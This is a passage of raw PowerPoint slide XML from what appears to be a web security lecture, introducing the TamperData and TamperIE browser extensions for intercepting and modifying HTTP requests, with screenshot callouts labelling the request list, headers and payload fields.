              </a:rPr>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is a plug-in to intercept requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TamperIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> for Internet Explorer is the IE version of Tamper Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many others are available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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pPr>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TamperData</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518160" y="1722120"/>
            <a:ext cx="8077200" cy="3048000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This extension allows us to mangle each request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easier to set up than an interception proxy because it's within the browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130052" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-14000" contrast="10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="4876800"/>
            <a:ext cx="3810000" cy="149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0053" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7391400" y="5257800"/>
            <a:ext cx="990600" cy="73818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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Click here to modify the request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130054" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-848561">
            <a:off x="6553200" y="5715000"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr 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685800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tampering with a Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13107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219200"/>
            <a:ext cx="7467600" cy="5327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1076" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:lum bright="-12000" contrast="8000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="1676400"/>
            <a:ext cx="4057650" cy="3903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1077"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57800" y="4191000"/>
            <a:ext cx="1504950" cy="1584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1078"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705600" y="2362200"/>
            <a:ext cx="1223963" cy="2025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1079" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="1295400"/>
            <a:ext cx="1143000" cy="94297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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>List of all the requests seen by TamperData</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131080" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-9323386">
            <a:off x="350838" y="2300288"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131081" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="4343400"/>
            <a:ext cx="1143000" cy="95408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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Information about the selected Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131082" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="9554003">
            <a:off x="287338" y="5307013"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131083" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3733800" y="4191000"/>
            <a:ext cx="1143000" cy="52387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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Header Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131084" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6719030">
            <a:off x="3335338" y="3859213"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131085" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5400675" y="3141663"/>
            <a:ext cx="1143000" cy="52387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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Payload Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131086" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6719030">
            <a:off x="5002213" y="2809875"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131087" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1450739">
            <a:off x="7983538" y="3325813"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131088" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8001000" y="3962400"/>
            <a:ext cx="1143000" cy="94297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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Various tasks TamperData can perform</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131089" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1450739">
            <a:off x="6692900" y="5095875"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131090" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7543800" y="5410200"/>
            <a:ext cx="1143000" cy="94297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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
